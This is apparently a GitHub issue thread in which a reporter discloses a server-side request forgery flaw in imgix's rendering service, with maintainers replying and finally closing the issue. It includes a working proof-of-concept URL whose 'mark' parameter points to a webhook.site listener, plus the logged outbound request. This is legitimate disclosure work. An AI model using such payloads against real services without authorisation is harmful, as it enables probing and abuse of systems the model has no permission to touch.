ssrf external service interaction to malicious external source - security issue #120
Comments
|
@luqven , please review this security issue. |
|
Hey there @anwibugc and thanks for bringing this to our attention. I've gone ahead and forwarded this to the relevant team for review and planning out any mitigation steps as deemed necessary. |
|
Hi Team, Hope you are doing well. Any update for this? |
|
Hey @anwibugc, I believe the team is actively looking into this. I'll be sure to follow up here with any updates as I receive them. |
|
Hi @sherwinski @luqven, Any update for this? |
|
Hi Team, still no tag & assigned to this issue? Please check once. |
|
@anwibugc let me follow up with the team again. |
|
Hi @anwibugc - can you email support@imgix.com and reference this thread? We'd like to get more information from you so we can investigate further. In the meantime, we're going to close this issue because it's not an imgix-rails issue. It's an issue with our Rendering API. |
Hi Imgix Team,
I have found security vulnerability issue w.r.t one application utilizing imgix framework
#Vulnerability description & attacker scenario:
External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers
Steps to Reproduce
Access the site in incognito mode https://webhook.site/ it will create a listener for ssrf interaction such as https://webhook.site/#!/{{some random id}}
2.Copy the url of listener https://webhook.site/#!/{{some random id}} from created listener
https://images.pexels.com/photos/1168981/pexels-photo-1168981.jpeg?fit=&h=&mark=https://webhook.site/#!/{{some random id}}&markalign=&txt=&txtalign=&txtclr=&txtfont=&txtshad=&txtsize=&w=
4.Curl request that is generated from imgix application server
Curl request that is generated from imgix application server to webhook application listener this data is from interaction logs from webhook listener:
curl -X 'GET' 'https://webhook.site/9554d7ba-d76b-49f0-8fd9-ac1d480f4a77' -H 'connection: close' -H 'user-agent: imgix/2.0' -H 'accept-encoding: gzip' -H 'x-imgix-cache: MISS' -H 'x-imgix-hops: 1' -H 'x-imgix-id: 9d6c3a806cc8f1d43b714831abbc3d1617939d02' -H 'accept: /' -H 'host: webhook.site' -H 'content-length: ' -H 'content-type: '
You will see interaction in https://webhook.site/#!/ website
Proof of Concept - Steps to reproduce
Business Impact
The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.
more details around vulnerability.
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
The text was updated successfully, but these errors were encountered: